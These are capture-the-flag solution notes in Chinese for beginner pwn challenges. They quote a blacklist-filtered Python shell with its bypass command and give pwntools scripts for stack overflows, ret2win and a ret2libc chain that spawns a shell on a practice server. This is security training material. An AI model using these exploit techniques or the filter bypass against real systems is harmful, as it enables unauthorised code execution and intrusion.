NSSCTF PWN (入门)

1 [SWPUCTF 2021 新生赛]nc签到

这不是欺负老实人嘛~

import os

art = '''

   ((  "####@@!!$$    ))
       `#####@@!$$`  ))
    ((  '####@!!$:
   ((  ,####@!!$:   ))
       .###@!!$:
       `##@@!$:
        `#@!!$
  !@#    `#@!$:       @#$
   #$     `#@!$:       !@!
            '@!$:
        '`\   "!$: /`'
           '\  '!: /'
             "\ : /"
  -."-/\\\-."//.-"/:`\."-.JrS"."-=_\\
" -."-.\\"-."//.-".`-."_\\-.".-\".-//'''
print(art)
print("My_shell_ProVersion")

blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']

while True:
    command = input()
    for i in blacklist:
        if i in command:
            exit(0)
    os.system(command)

tac$IFS$1flag

2 [SWPUCTF 2021 新生赛]gift_pwn已解决

ret2fun.

from pwn import *

day3 = remote("1.14.71.254", 28339)
# day3 = process("./ret2sys")
gift = 0x4005B6

payload = b'a' * (0x10 + 8) + p64(gift)

day3.sendline(payload)
day3.interactive()

3 [CISCN 2019华北]PWN1

这里的覆盖是数值，这里是0x41348000。这玩意表示浮点数，有点疑惑。

from pwn import *

day3 = remote("1.14.71.254", 28907)
# day3 = process("./PWN1")

payload = b'a' * (0x30 - 4) + p32(0x41348000)
day3.recvuntil("Let's guess the number.\n")

day3.sendline(payload)
day3.interactive()

4 [SWPUCTF 2021 新生赛]whitegive_pwn

狗屎题目，没libc打不通。

from pwn import *
from LibcSearcher import *
io = remote('1.14.71.254', 28821)
elf = ELF('./ret2libc')

pop_rdi_ret = 0x0000000000400763
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']

payload1 = b'a' * 24 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendline(payload1)
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)

libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

payload2 = b'a' * 24 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
io.sendline(payload2)

io.interactive()

5 [BJDCTF 2020]babystack2.0已解决

from pwn import *
day3 = remote("1.14.71.254",28058)
# day3 = process("./pwn")

day3.recvuntil("your name:\n")
day3.sendline(b'-1')
backdoor = 0x400726

payload = b'a' * 0x18 + p64(backdoor)
day3.sendline(payload)
day3.interactive()

6 [BJDCTF 2020]babystack

from pwn import *
day3 = remote("1.14.71.254",28582)
# day3 = process("./pwn")

day3.recvuntil("your name:\n")
day3.sendline(b'100')
backdoor = 0x4006E6

payload = b'a' * 0x18 + p64(backdoor)
day3.sendline(payload)
day3.interactive()

7 [watevrCTF 2019]Voting Machine 1已解决

from pwn import *
day3 = remote("1.14.71.254",28784)
# day3 = process("./Voting Machine")

day3.recvuntil("Vote: ")
backdoor = 0x400807

payload = b'a' * (0x2 + 8) + p64(backdoor)
day3.sendline(payload)
day3.interactive()

又做了几道简单题。。